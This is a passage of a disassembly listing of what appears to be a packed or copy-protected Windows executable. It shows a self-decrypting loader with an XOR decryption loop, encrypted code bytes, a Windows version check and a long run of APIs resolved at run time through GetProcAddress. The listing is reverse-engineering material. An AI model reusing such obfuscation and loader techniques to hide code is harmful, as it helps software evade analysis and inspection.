mov ecx, [ebp+var_8]
call sub_4FD090
cmp eax, [ebp+var_50]
jz short loc_4FD637
push 0
push 0
push 0
push 0EF0000F9h
call ds:dword_50E00C ; RaiseException
loc_4FD637: ; CODE XREF: sub_4FD2E0+344�j
mov ecx, [ebp+var_50]
push ecx
mov edx, [ebp+arg_0]
push edx
push 0
call sub_4FCF6E
add esp, 0Ch
cmp eax, [ebp+var_5C]
jz short loc_4FD65F
push 0
push 0
push 0
push 0EF0000FBh
call ds:dword_50E00C ; RaiseException
loc_4FD65F: ; CODE XREF: sub_4FD2E0+36C�j
mov eax, [ebp+var_50]
push eax
mov ecx, [ebp+arg_0]
push ecx
mov edx, ds:dword_51168C
push edx
call ds:dword_511670 ; FlushInstructionCache
mov eax, [ebp+var_48]
push eax
call ds:dword_50E008 ; LocalFree
mov ecx, [ebp+var_8]
push ecx
call ds:dword_50E008 ; LocalFree
push offset dword_511A28
call ds:dword_50E000 ; InitializeCriticalSection
push offset dword_511930
call ds:dword_50E000 ; InitializeCriticalSection
call sub_4FE2E0
push 80h
call sub_50835A
add esp, 4
mov [ebp+var_6C], eax
cmp [ebp+var_6C], 0
jz short loc_4FD6C6
mov ecx, [ebp+var_6C]
call sub_4FDDD0
mov [ebp+var_70], eax
jmp short loc_4FD6CD
; ---------------------------------------------------------------------------
loc_4FD6C6: ; CODE XREF: sub_4FD2E0+3D7�j
mov [ebp+var_70], 0
loc_4FD6CD: ; CODE XREF: sub_4FD2E0+3E4�j
mov edx, offset dword_4FD720
mov eax, [ebp+var_70]
mov [edx+4], eax
call sub_508C17
mov ds:dword_5160DC, eax
mov ecx, [ebp+var_10]
mov edx, [ecx]
mov ds:dword_511698, edx
mov eax, [ebp+var_4]
mov ds:off_51169C, eax
pop edi
pop esi
mov esp, ebp
pop ebp
retn
sub_4FD2E0 endp
; ---------------------------------------------------------------------------
align 10h
loc_4FD700: ; CODE XREF: sub_4FDB8D�p
call sub_4FD2E0
pop eax
call loc_4FDE60
pop eax
mov [esp+24h], eax
popa
pop eax
pop eax
call eax
call sub_50A0BC
; ---------------------------------------------------------------------------
db 6 dup(0CCh)
dword_4FD720 dd 0 ; DATA XREF: sub_4FD2E0:loc_4FD6CD�o
; sub_5047BF+2B�o ...
db 90h
db 1Eh, 94h, 0
aHereisbootcode db 27h,'HEREISBOOTCODE',27h,0
align 10h
dw 8
unicode 0, <>,0
a_text db '.text',0 ; DATA XREF: _7:off_51169C�o
align 4
dd 3A8F3h, 1000h, 1CA00h, 400h, 3 dup(0)
dd 60000020h, 6164722Eh, 6174h, 2588h, 3C000h, 1400h, 1CE00h
dd 3 dup(0)
dd 40000040h, 7461642Eh, 61h, 0B5A3Dh, 3F000h, 7C00h, 1E200h
dd 3 dup(0)
dd 0C0000040h, 6164692Eh, 6174h, 0F4Eh, 0F5000h, 800h
dd 25E00h, 3 dup(0)
dd 0C0000040h, 6C65722Eh, 636Fh, 510Eh, 0F6000h, 5 dup(0)
dd 40000040h, 7865742Eh, 74h, 11ABFh, 0FC000h, 0B600h
dd 26600h, 3 dup(0)
dd 0E0000040h, 6164722Eh, 6174h, 0D76h, 10E000h, 0E00h
dd 31C00h, 3 dup(0)
dd 0E0000040h, 7461642Eh, 61h, 7110h, 10F000h, 1C00h, 32A00h
dd 3 dup(0)
dd 0E0000040h, 0A9h dup(0)
dd 32000000h, 30353030h
db 35h, 31h, 38h
; =============== S U B R O U T I N E =======================================
public start
start proc near
call $+5
pusha
call sub_4FDB8D ; CODE XREF: start+47�j
and [eax], esi
mov al, 55h
sbb esi, [bx+si-159Bh]
fild qword ptr [edx-27h]
dec ebp
aas
mov ebx, [ebp-66628BB6h]
pop esi
imul esp, [ebx+64BA309h], 7947007Ah
sbb eax, 0A6866B32h
inc edx
dec edi
add [ebx-4D679EACh], cl
dec esi
jns short loc_4FDB6F
insd
loc_4FDB6F: ; CODE XREF: start+39�j
and eax, 0C17C47D5h
into
and [ebp+25h], ebp
aad 47h
jl short near ptr loc_4FDB39+4
into
and ecx, ebp ; CODE XREF: _5:004FDF39�p _5:004FECB0�p ...
start endp ; sp-analysis failed
sbb ch, [ebp+0]
add cl, ch
db 2Eh
insd
; ---------------------------------------------------------------------------
dw 0
; ---------------------------------------------------------------------------
jmp loc_5048B6
; =============== S U B R O U T I N E =======================================
sub_4FDB8D proc near ; CODE XREF: start:loc_4FDB39�p
call loc_4FD700
jmp sub_50DAB0
sub_4FDB8D endp
; ---------------------------------------------------------------------------
jmp sub_50DAB0
; ---------------------------------------------------------------------------
dd 0CBCB4CE9h, 0E452E9DBh, 0E7E9626Dh, 0E9234555h, 0E41E8650h
dd 0FCAA04C9h, 865B0446h, 0A6AF4B6Ah, 0E9BAF88Dh, 20h
dd 0F3h, 2060400h, 9E6h, 5 dup(0)
dd 41DDB5F0h, 8CE6E82Eh, 6C962C01h, 225D83EAh, 64643168h
dd 652E6E33h, 422E6578h, 584Fh, 0Ch dup(0)
dd 2A2E2A00h, 63h dup(0)
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4FDDD0 proc near ; CODE XREF: sub_4FD2E0+3DC�p
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 8
mov [ebp+var_8], ecx
mov eax, [ebp+var_8]
mov dword ptr [eax+78h], 0
mov ecx, [ebp+var_8]
mov dword ptr [ecx+7Ch], 0
push offset aKernel32_dll_0 ; "kernel32.dll"
call ds:dword_50E014 ; GetModuleHandleA
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jnz short loc_4FDE12
push 0
push 0
push 0
push 0EF0000FDh
call ds:dword_50E00C ; RaiseException
loc_4FDE12: ; CODE XREF: sub_4FDDD0+2F�j
mov edx, [ebp+var_8]
push edx
call ds:dword_50E000 ; InitializeCriticalSection
mov eax, [ebp+var_8]
add eax, 18h
push eax
call ds:dword_50E000 ; InitializeCriticalSection
mov ecx, [ebp+var_8]
add ecx, 30h
push ecx
call ds:dword_50E000 ; InitializeCriticalSection
mov edx, [ebp+var_8]
add edx, 48h
push edx
call ds:dword_50E000 ; InitializeCriticalSection
mov eax, [ebp+var_8]
mov esp, ebp
pop ebp
retn
sub_4FDDD0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4FDE50 proc near ; CODE XREF: sub_502DD0+50�p
push ebp
mov ebp, esp
mov eax, ds:dword_511688
mov al, [eax+70h]
pop ebp
retn
sub_4FDE50 endp
; ---------------------------------------------------------------------------
align 10h
loc_4FDE60: ; CODE XREF: _5:004FD706�p
push ebp
mov ebp, esp
sub esp, 10Ch
push ebx
push esi
push edi
mov eax, [ebp+8]
mov ds:dword_511688, eax
push offset aKernel32_dll_0 ; "kernel32.dll"
call ds:dword_511718 ; GetModuleHandleA
mov [ebp-8], eax
cmp dword ptr [ebp-8], 0
jnz short loc_4FDE99
push 0
push 0
push 0
push 0EF0000FDh
call ds:dword_511778 ; RaiseException
loc_4FDE99: ; CODE XREF: _5:004FDE86�j
push offset aVirtualalloc ; "VirtualAlloc"
mov ecx, [ebp-8]
push ecx
call ds:dword_511728 ; GetProcAddress
mov [ebp-0Ch], eax
cmp dword ptr [ebp-0Ch], 0
jnz short loc_4FDEC2
push 0
push 0
push 0
push 0EF0000FCh
call ds:dword_511778 ; RaiseException
loc_4FDEC2: ; CODE XREF: _5:004FDEAF�j
push 4
push 1000h
push 1000h
push 0
call dword ptr [ebp-0Ch]
mov ds:dword_511674, eax
push 4
push 2000h
call ds:dword_51173C ; GetTickCount
xor edx, edx
mov ecx, 8000h
div ecx
push edx
push 0
call dword ptr [ebp-0Ch]
mov ds:dword_51167C, eax
push 4
push 1000h
push 1000h
push 0
call dword ptr [ebp-0Ch]
mov ds:dword_511678, eax
mov edx, ds:dword_511674
mov dword ptr [edx], 19660Dh
mov eax, ds:dword_511678
mov dword ptr [eax], 3C6EF35Fh
mov dword ptr [ebp-14h], 0
mov dword ptr [ebp-4], 0
push 2E0000h
call near ptr loc_4FDB7D+1
adc eax, 3C65AC02h
cmpxchg [esi], cl
xchg edi, [edx+2E8519EFh]
cmp ecx, ebx
xchg eax, ecx
db 66h
out 0F9h, al ; AT 80287 data.
; 286 sends opcodes & operands and receives results.
mov [ecx+5Ch], ebp
dec edi
db 36h
pop edi
xlat
sbb ecx, [esi]
add [edx+6E24A10Dh], eax
dec esp
xor [eax+73h], ecx
mov ds:48B5728Dh, al
db 3Eh
xor [ebx+78h], ecx
mov dl, 8Ah
fcomp qword ptr [eax+ebx*8-38h]
and eax, 8467D355h
xchg eax, ecx
sahf
and [ebp-13713BBFh], al
or ah, [ebx-48D2FD85h]
inc edi
mov esp, 77849591h
add eax, 4C759C32h
pop ds
xchg eax, esi
push ds
cmp cl, [edi-1]
and al, 31h
db 3Eh
dec ebx
xor [ebp+72h], ah
; ---------------------------------------------------------------------------
aDmqqh?2rr3EUul db 'dqqH?23҅uE',8,'qEh',1Bh,0
db '!',0
db 0E8h, 0BCh, 0FBh
dd 9090FFFFh, 0C985C933h, 558BEE75h, 8D8D52E8h, 0FFFFFF18h
dd 41EFE8h, 216800h, 9BE80026h, 90FFFFFBh, 85C03390h, 6AEE75C0h
dd 840D8B08h, 51005116h, 0FF188D8Dh, 94E8FFFFh, 68000046h
dd 26h, 0FFFB75E8h, 0DD7144FFh, 57C78D29h, 56C454C1h, 0E9957046h
dd 2E4E5B6Ch, 7725EB5Bh, 0ADF7793Fh, 0D11C487Eh, 0DF97F072h
dd 3F5DFA9Bh, 75E9DCC2h, 0F7518C7h, 0B6514437h, 6D7A8355h
dd 0C0339090h, 0EE75C085h, 16840D8Bh, 118B0051h, 0A1F05589h
dd 511684h, 4D89088Bh, 9468ECh, 0F3E80000h, 830000A2h
dd 858904C4h, 0FFFFFEFCh, 0FEFC958Bh, 9589FFFFh, 0FFFFFF14h
dd 25B9h, 8BC03300h, 0FFFF14BDh, 8BABF3FFh, 0FFFF1485h
dd 9400C7FFh, 8B000000h, 0FFFF148Dh, 15FF51FFh, 511738h
dd 0FF14958Bh, 428BFFFFh, 1680A310h, 85C70051h, 0FFFFFF10h
dd 0
; ---------------------------------------------------------------------------
mov ecx, ds:dword_511680
mov [ebp-10Ch], ecx
cmp dword ptr [ebp-10Ch], 0
jz short loc_4FE0E8
cmp dword ptr [ebp-10Ch], 1
jz short loc_4FE0F7
cmp dword ptr [ebp-10Ch], 2
jz short loc_4FE14E
jmp loc_4FE1EB
; ---------------------------------------------------------------------------
loc_4FE0E8: ; CODE XREF: _5:004FE0CF�j
mov dword ptr [ebp-0F0h], offset aWin32s ; "win32s"
jmp loc_4FE1EB
; ---------------------------------------------------------------------------
loc_4FE0F7: ; CODE XREF: _5:004FE0D8�j
mov edx, [ebp-0ECh]
cmp dword ptr [edx+8], 0
jnz short loc_4FE10F
mov dword ptr [ebp-0F0h], offset aWindows95 ; "Windows95"
jmp short loc_4FE149
; ---------------------------------------------------------------------------
loc_4FE10F: ; CODE XREF: _5:004FE101�j
mov eax, [ebp-0ECh]
cmp dword ptr [eax+8], 0Ah
jnz short loc_4FE127
mov dword ptr [ebp-0F0h], offset aWindows98 ; "Windows98"
jmp short loc_4FE149
; ---------------------------------------------------------------------------
loc_4FE127: ; CODE XREF: _5:004FE119�j
mov ecx, [ebp-0ECh]
cmp dword ptr [ecx+8], 5Ah
jnz short loc_4FE13F
mov dword ptr [ebp-0F0h], offset aWindowsme ; "WindowsMe"
jmp short loc_4FE149
; ---------------------------------------------------------------------------
loc_4FE13F: ; CODE XREF: _5:004FE131�j
mov dword ptr [ebp-0F0h], offset aWindows9xUnkno ; "Windows9x(unknown)"
loc_4FE149: ; CODE XREF: _5:004FE10D�j _5:004FE125�j ...
jmp loc_4FE1EB
; ---------------------------------------------------------------------------
loc_4FE14E: ; CODE XREF: _5:004FE0E1�j
mov edx, [ebp-0ECh]
cmp dword ptr [edx+4], 3
jnz short loc_4FE169
mov dword ptr [ebp-0F0h], offset aWindowsnt3_51 ; "WindowsNT(3.51)"
jmp loc_4FE1EB
; ---------------------------------------------------------------------------
loc_4FE169: ; CODE XREF: _5:004FE158�j
mov eax, [ebp-0ECh]
cmp dword ptr [eax+4], 4
jnz short loc_4FE181
mov dword ptr [ebp-0F0h], offset aWindowsnt4_0 ; "WindowsNT(4.0)"
jmp short loc_4FE1EB
; ---------------------------------------------------------------------------
loc_4FE181: ; CODE XREF: _5:004FE173�j
mov ecx, [ebp-0ECh]
cmp dword ptr [ecx+4], 5
jnz short loc_4FE1E1
mov edx, [ebp-0ECh]
cmp dword ptr [edx+8], 0
jnz short loc_4FE1A5
mov dword ptr [ebp-0F0h], offset aWindows2000 ; "Windows2000"
jmp short loc_4FE1DF
; ---------------------------------------------------------------------------
loc_4FE1A5: ; CODE XREF: _5:004FE197�j
mov eax, [ebp-0ECh]
cmp dword ptr [eax+8], 1
jnz short loc_4FE1BD
mov dword ptr [ebp-0F0h], offset aWindowsxp ; "WindowsXP"
jmp short loc_4FE1DF
; ---------------------------------------------------------------------------
loc_4FE1BD: ; CODE XREF: _5:004FE1AF�j
mov ecx, [ebp-0ECh]
cmp dword ptr [ecx+8], 2
jnz short loc_4FE1D5
mov dword ptr [ebp-0F0h], offset aWindows_net ; "Windows.NET"
jmp short loc_4FE1DF
; ---------------------------------------------------------------------------
loc_4FE1D5: ; CODE XREF: _5:004FE1C7�j
mov dword ptr [ebp-0F0h], offset aWindowsntUnkno ; "WindowsNT(unknown)"
loc_4FE1DF: ; CODE XREF: _5:004FE1A3�j _5:004FE1BB�j ...
jmp short loc_4FE1EB
; ---------------------------------------------------------------------------
loc_4FE1E1: ; CODE XREF: _5:004FE18B�j
mov dword ptr [ebp-0F0h], offset aWindowsntUnkno ; "WindowsNT(unknown)"
loc_4FE1EB: ; CODE XREF: _5:004FE0E3�j _5:004FE0F2�j ...
mov edx, [ebp-0ECh]
mov [ebp-108h], edx
mov eax, [ebp-108h]
push eax
call sub_5083DD
add esp, 4
mov ecx, ds:dword_511684
mov edx, [ecx+2Ch]
mov [ebp-0F4h], edx
cmp dword ptr [ebp-0F4h], 0
jz short loc_4FE28F
mov eax, [ebp-0F4h]
mov [ebp-0FCh], eax
mov dword ptr [ebp-0F8h], 0
jmp short loc_4FE245
; ---------------------------------------------------------------------------
loc_4FE236: ; CODE XREF: _5:004FE28D�j
mov ecx, [ebp-0F8h]
add ecx, 1
mov [ebp-0F8h], ecx
loc_4FE245: ; CODE XREF: _5:004FE234�j
cmp dword ptr [ebp-0F8h], 80h
jge short loc_4FE28F
mov edx, [ebp-0FCh]
imul edx, 19660Dh
add edx, 3C6EF35Fh
mov [ebp-0FCh], edx
mov eax, [ebp-0F8h]
mov ecx, [ebp-0F4h]
mov edx, [ecx+eax*4]
xor edx, [ebp-0FCh]
mov eax, [ebp-0F8h]
mov ecx, [ebp-0F4h]
mov [ecx+eax*4], edx
jmp short loc_4FE236
; ---------------------------------------------------------------------------
loc_4FE28F: ; CODE XREF: _5:004FE21C�j _5:004FE24F�j
mov edx, ds:dword_511684
mov eax, [edx+24h]
and eax, 10h
neg eax
sbb eax, eax
neg eax
mov ds:byte_511694, al
call sub_504DC0
mov ecx, [ebp-14h]
mov [ebp+8], ecx
cmp ds:dword_515A54, 0
jz short loc_4FE2CD
push 0
push 0
push 0
mov edx, ds:dword_515A54
push edx
call ds:dword_511838 ; PostMessageA
loc_4FE2CD: ; CODE XREF: _5:004FE2B8�j
xor eax, eax
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4FE2E0 proc near ; CODE XREF: sub_4FD2E0+3BE�p
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 14h
push offset aKernel32_dll_0 ; "kernel32.dll"
call ds:dword_50E014 ; GetModuleHandleA
mov [ebp+var_C], eax
cmp [ebp+var_C], 0
jnz short loc_4FE30B
push 0
push 0
push 0
push 0EF0000FDh
call ds:dword_50E00C ; RaiseException
loc_4FE30B: ; CODE XREF: sub_4FE2E0+18�j
push offset aClosehandle ; "CloseHandle"
mov eax, [ebp+var_C]
push eax
call ds:dword_50E004 ; GetProcAddress
mov ds:dword_5116A4, eax
push offset aCreatefilea ; "CreateFileA"
mov ecx, [ebp+var_C]
push ecx
call ds:dword_50E004 ; GetProcAddress
mov ds:dword_5116A8, eax
push offset aCreatefilew ; "CreateFileW"
mov edx, [ebp+var_C]
push edx
call ds:dword_50E004 ; GetProcAddress
mov ds:dword_5116AC, eax
push offset aCreatefilemapp ; "CreateFileMappingA"
mov eax, [ebp+var_C]
push eax
call ds:dword_50E004 ; GetProcAddress
mov ds:dword_5116B0, eax
push offset aCreatefilema_0 ; "CreateFileMappingW"
mov ecx, [ebp+var_C]
push ecx
call ds:dword_50E004 ; GetProcAddress
mov ds:dword_5116B4, eax
push offset aCreateprocessa ; "CreateProcessA"
mov edx, [ebp+var_C]
push edx
call ds:dword_50E004 ; GetProcAddress
mov ds:dword_5116B8, eax
push offset aDebugbreak ; "DebugBreak"
mov eax, [ebp+var_C]
push eax
call ds:dword_50E004 ; GetProcAddress
mov ds:dword_5116BC, eax
push offset aDeletefilea ; "DeleteFileA"
mov ecx, [ebp+var_C]
push ecx
call ds:dword_50E004 ; GetProcAddress
mov ds:dword_5116C0, eax
push offset aEntercriticals ; "EnterCriticalSection"
mov edx, [ebp+var_C]
push edx
call ds:dword_50E004 ; GetProcAddress
mov ds:dword_5116C4, eax
push offset aExitprocess ; "ExitProcess"
mov eax, [ebp+var_C]
push eax
call ds:dword_50E004 ; GetProcAddress
mov ds:dword_5116C8, eax
push offset aFindclose ; "FindClose"
mov ecx, [ebp+var_C]
push ecx
call ds:dword_50E004 ; GetProcAddress
mov ds:dword_5116CC, eax
push offset aFindfirstfilea ; "FindFirstFileA"
mov edx, [ebp+var_C]
push edx
call ds:dword_50E004 ; GetProcAddress
mov ds:dword_5116D0, eax
push offset aFindnextfilea ; "FindNextFileA"
mov eax, [ebp+var_C]
push eax
call ds:dword_50E004 ; GetProcAddress
mov ds:dword_5116D4, eax
push offset aFlushfilebuffe ; "FlushFileBuffers"
mov ecx, [ebp+var_C]
push ecx
call ds:dword_50E004 ; GetProcAddress
mov ds:dword_5116D8, eax
push offset aFormatmessagea ; "FormatMessageA"
mov edx, [ebp+var_C]
push edx
call ds:dword_50E004 ; GetProcAddress
mov ds:dword_5116DC, eax
push offset aFreelibrary ; "FreeLibrary"
mov eax, [ebp+var_C]
push eax
call ds:dword_50E004 ; GetProcAddress
mov ds:dword_5116E0, eax
push offset aGetcurrentproc ; "GetCurrentProcess"
mov ecx, [ebp+var_C]
push ecx
call ds:dword_50E004 ; GetProcAddress
mov ds:dword_5116E4, eax
push offset aGetcurrentpr_0 ; "GetCurrentProcessId"
mov edx, [ebp+var_C]
push edx
call ds:dword_50E004 ; GetProcAddress
mov ds:dword_5116E8, eax
push offset aGetenvironment ; "GetEnvironmentVariableA"
mov eax, [ebp+var_C]
push eax
call ds:dword_50E004 ; GetProcAddress
mov ds:dword_5116EC, eax
push offset aGetexitcodepro ; "GetExitCodeProcess"
mov ecx, [ebp+var_C]
push ecx
call ds:dword_50E004 ; GetProcAddress
mov ds:dword_5116F0, eax
push offset aGetfileattribu ; "GetFileAttributesA"
mov edx, [ebp+var_C]
push edx
call ds:dword_50E004 ; GetProcAddress
mov ds:dword_5116F4, eax
push offset aGetfileattri_0 ; "GetFileAttributesW"
mov eax, [ebp+var_C]
push eax
call ds:dword_50E004 ; GetProcAddress
mov ds:dword_5116F8, eax
push offset aGetfileinforma ; "GetFileInformationByHandle"
mov ecx, [ebp+var_C]
push ecx
call ds:dword_50E004 ; GetProcAddress
mov ds:dword_5116FC, eax
push offset aGetfilesize ; "GetFileSize"
mov edx, [ebp+var_C]
push edx
call ds:dword_50E004 ; GetProcAddress
mov ds:dword_511700, eax
push offset aGetfiletime ; "GetFileTime"
mov eax, [ebp+var_C]
push eax
call ds:dword_50E004 ; GetProcAddress
mov ds:dword_511704, eax
push offset aGetfullpathnam ; "GetFullPathNameA"
mov ecx, [ebp+var_C]
push ecx
call ds:dword_50E004 ; GetProcAddress
mov ds:dword_511708, eax
push offset aGetfullpathn_0 ; "GetFullPathNameW"
mov edx, [ebp+var_C]
push edx
call ds:dword_50E004 ; GetProcAddress
mov ds:dword_51170C, eax
push offset aGetlasterror ; "GetLastError"
mov eax, [ebp+var_C]
push eax
call ds:dword_50E004 ; GetProcAddress
mov ds:dword_511710, eax
push offset aGetmodulefilen ; "GetModuleFileNameA"
mov ecx, [ebp+var_C]
push ecx
call ds:dword_50E004 ; GetProcAddress
mov ds:dword_511714, eax
push offset aGetmodulehandl ; "GetModuleHandleA"
mov edx, [ebp+var_C]
push edx
call ds:dword_50E004 ; GetProcAddress
mov ds:dword_511718, eax
push offset aGetprivateprof ; "GetPrivateProfileIntA"
mov eax, [ebp+var_C]
push eax
call ds:dword_50E004 ; GetProcAddress
mov ds:dword_51171C, eax
push offset aGetprivatepr_0 ; "GetPrivateProfileSectionNamesA"
mov ecx, [ebp+var_C]
push ecx
call ds:dword_50E004 ; GetProcAddress
mov ds:dword_511720, eax
push offset aGetprivatepr_1 ; "GetPrivateProfileStringA"
mov edx, [ebp+var_C]
push edx
call ds:dword_50E004 ; GetProcAddress
mov ds:dword_511724, eax
push offset aGetprocaddress ; "GetProcAddress"
mov eax, [ebp+var_C]
push eax
call ds:dword_50E004 ; GetProcAddress
mov ds:dword_511728, eax
push offset aGetsystemtimea ; "GetSystemTimeAsFileTime"
mov ecx, [ebp+var_C]
push ecx
call ds:dword_50E004 ; GetProcAddress
mov ds:dword_51172C, eax
push offset aGettempfilenam ; "GetTempFileNameA"
mov edx, [ebp+var_C]
push edx
call ds:dword_50E004 ; GetProcAddress
mov ds:dword_511730, eax
push offset aGettemppatha ; "GetTempPathA"
mov eax, [ebp+var_C]
push eax
call ds:dword_50E004 ; GetProcAddress
mov ds:dword_511734, eax
push offset aGetversionexa ; "GetVersionExA"
mov ecx, [ebp+var_C]
push ecx
call ds:dword_50E004 ; GetProcAddress
mov ds:dword_511738, eax
push offset aGettickcount ; "GetTickCount"
mov edx, [ebp+var_C]
push edx
call ds:dword_50E004 ; GetProcAddress
mov ds:dword_51173C, eax
push offset aHeapalloc ; "HeapAlloc"
mov eax, [ebp+var_C]
push eax
call ds:dword_50E004 ; GetProcAddress
mov ds:dword_511740, eax
push offset aHeapfree ; "HeapFree"
mov ecx, [ebp+var_C]
push ecx
call ds:dword_50E004 ; GetProcAddress
mov ds:dword_511744, eax
push offset aHeapcreate ; "HeapCreate"
mov edx, [ebp+var_C]
push edx
call ds:dword_50E004 ; GetProcAddress
mov ds:dword_511748, eax
push offset aInitializecrit ; "InitializeCriticalSection"
mov eax, [ebp+var_C]
push eax
call ds:dword_50E004 ; GetProcAddress
mov ds:dword_51174C, eax
push offset aDeletecritical ; "DeleteCriticalSection"
mov ecx, [ebp+var_C]
push ecx
call ds:dword_50E004 ; GetProcAddress
mov ds:dword_511750, eax
push offset aLeavecriticals ; "LeaveCriticalSection"
mov edx, [ebp+var_C]
push edx
call ds:dword_50E004 ; GetProcAddress
mov ds:dword_511754, eax
push offset aLoadlibrarya ; "LoadLibraryA"
mov eax, [ebp+var_C]
push eax
call ds:dword_50E004 ; GetProcAddress
mov ds:dword_51175C, eax
push offset aLoadlibraryexa ; "LoadLibraryExA"
mov ecx, [ebp+var_C]
push ecx
call ds:dword_50E004 ; GetProcAddress
mov ds:dword_511758, eax
push offset aLocalalloc ; "LocalAlloc"
mov edx, [ebp+var_C]
push edx
call ds:dword_50E004 ; GetProcAddress
mov ds:dword_511760, eax
push offset aLocalfree ; "LocalFree"
mov eax, [ebp+var_C]
push eax
call ds:dword_50E004 ; GetProcAddress
mov ds:dword_511764, eax
push offset aLockfile ; "LockFile"
mov ecx, [ebp+var_C]
push ecx
call ds:dword_50E004 ; GetProcAddress
mov ds:dword_511768, eax
push offset aMapviewoffile ; "MapViewOfFile"
mov edx, [ebp+var_C]
push edx
call ds:dword_50E004 ; GetProcAddress
mov ds:dword_51176C, eax
push offset aMultibytetowid ; "MultiByteToWideChar"
mov eax, [ebp+var_C]
push eax
call ds:dword_50E004 ; GetProcAddress
mov ds:dword_511770, eax
push offset aOpenprocess ; "OpenProcess"
mov ecx, [ebp+var_C]
push ecx
call ds:dword_50E004 ; GetProcAddress
mov ds:dword_511774, eax
push offset aRaiseexception ; "RaiseException"
mov edx, [ebp+var_C]
push edx
call ds:dword_50E004 ; GetProcAddress
mov ds:dword_511778, eax
push offset aReadfile_0 ; "ReadFile"
mov eax, [ebp+var_C]
push eax
call ds:dword_50E004 ; GetProcAddress
mov ds:dword_51177C, eax
push offset aSetenvironment ; "SetEnvironmentVariableA"
mov ecx, [ebp+var_C]
push ecx
call ds:dword_50E004 ; GetProcAddress
mov ds:dword_511780, eax
push offset aSetevent ; "SetEvent"
mov edx, [ebp+var_C]
push edx
call ds:dword_50E004 ; GetProcAddress
mov ds:dword_511784, eax
push offset aSetfilepointer ; "SetFilePointer"
mov eax, [ebp+var_C]
push eax
call ds:dword_50E004 ; GetProcAddress
mov ds:dword_511788, eax
push offset aSetlasterror ; "SetLastError"
mov ecx, [ebp+var_C]
push ecx
call ds:dword_50E004 ; GetProcAddress
mov ds:dword_51178C, eax
push offset aSetunhandledex ; "SetUnhandledExceptionFilter"
mov edx, [ebp+var_C]
push edx
call ds:dword_50E004 ; GetProcAddress
mov ds:dword_511790, eax
push offset aSleep ; "Sleep"
mov eax, [ebp+var_C]
push eax
call ds:dword_50E004 ; GetProcAddress
mov ds:dword_511794, eax
push offset aTerminateproce ; "TerminateProcess"
mov ecx, [ebp+var_C]
push ecx
call ds:dword_50E004 ; GetProcAddress
mov ds:dword_511798, eax
push offset aUnlockfile ; "UnlockFile"
mov edx, [ebp+var_C]
push edx
call ds:dword_50E004 ; GetProcAddress
mov ds:dword_51179C, eax
push offset aUnmapviewoffil ; "UnmapViewOfFile"
mov eax, [ebp+var_C]
push eax
call ds:dword_50E004 ; GetProcAddress
mov ds:dword_5117A0, eax
push offset aVirtualalloc ; "VirtualAlloc"
mov ecx, [ebp+var_C]
push ecx
call ds:dword_50E004 ; GetProcAddress
mov ds:dword_5117A4, eax
push offset aVirtualfree ; "VirtualFree"
mov edx, [ebp+var_C]
push edx
call ds:dword_50E004 ; GetProcAddress
mov ds:dword_5117A8, eax
push offset aVirtualprotect ; "VirtualProtect"
mov eax, [ebp+var_C]
push eax
call ds:dword_50E004 ; GetProcAddress
mov ds:dword_5117AC, eax
push offset aVirtualquery ; "VirtualQuery"
mov ecx, [ebp+var_C]
push ecx
call ds:dword_50E004 ; GetProcAddress
mov ds:dword_5117B0, eax
push offset aWaitforsingleo ; "WaitForSingleObject"
mov edx, [ebp+var_C]
push edx
call ds:dword_50E004 ; GetProcAddress
mov ds:dword_5117B4, eax
push offset aWidechartomult ; "WideCharToMultiByte"
mov eax, [ebp+var_C]
push eax
call ds:dword_50E004 ; GetProcAddress
mov ds:dword_5117B8, eax
push offset aWritefile ; "WriteFile"
mov ecx, [ebp+var_C]
push ecx
call ds:dword_50E004 ; GetProcAddress
mov ds:dword_5117BC, eax
push offset aLstrcmpia ; "lstrcmpiA"
mov edx, [ebp+var_C]
push edx
call ds:dword_50E004 ; GetProcAddress
mov ds:dword_5117C0, eax
push offset aUser32_dll_1 ; "user32.dll"
call ds:dword_51175C ; LoadLibraryA
mov [ebp+var_10], eax
cmp [ebp+var_10], 0
jnz short loc_4FE8D0
push 0
push 0
push 0
push 0EF0000F7h
call ds:dword_50E00C ; RaiseException
loc_4FE8D0: ; CODE XREF: sub_4FE2E0+5DD�j
push offset aChangedisplays ; "ChangeDisplaySettingsA"
mov eax, [ebp+var_10]
push eax
call ds:dword_50E004 ; GetProcAddress
mov ds:dword_5117C4, eax
push offset aCharupperbuffa ; "CharUpperBuffA"
mov ecx, [ebp+var_10]
push ecx
call ds:dword_50E004 ; GetProcAddress
mov ds:dword_5117C8, eax
push offset aLoadimagea ; "LoadImageA"
mov edx, [ebp+var_10]
push edx
call ds:dword_50E004 ; GetProcAddress
mov ds:dword_5117CC, eax
push offset aMessageboxa_0 ; "MessageBoxA"
mov eax, [ebp+var_10]
push eax
call ds:dword_50E004 ; GetProcAddress
mov ds:dword_5117D0, eax
push offset aWsprintfa_0 ; "wsprintfA"
mov ecx, [ebp+var_10]
push ecx
call ds:dword_50E004 ; GetProcAddress
mov ds:dword_5117D4, eax
push offset aWvsprintfa ; "wvsprintfA"
mov edx, [ebp+var_10]
push edx
call ds:dword_50E004 ; GetProcAddress
mov ds:dword_5117D8, eax
push offset aGdi32_dll_0 ; "gdi32.dll"
call ds:dword_51175C ; LoadLibraryA
mov [ebp+var_8], eax
cmp [ebp+var_8], 0
jnz short loc_4FE96D
push 0
push 0
push 0
push 0EF0000F6h
call ds:dword_50E00C ; RaiseException
loc_4FE96D: ; CODE XREF: sub_4FE2E0+67A�j
push offset aAddfontresourc ; "AddFontResourceA"
mov eax, [ebp+var_8]
push eax
call ds:dword_50E004 ; GetProcAddress
mov ds:dword_5117DC, eax
push offset aCreatecompat_0 ; "CreateCompatibleDC"
mov ecx, [ebp+var_8]
push ecx
call ds:dword_50E004 ; GetProcAddress
mov ds:dword_5117E0, eax
push offset aCreatedibsec_0 ; "CreateDIBSection"
mov edx, [ebp+var_8]
push edx
call ds:dword_50E004 ; GetProcAddress
mov ds:dword_5117E4, eax
push offset aDeletedc_0 ; "DeleteDC"
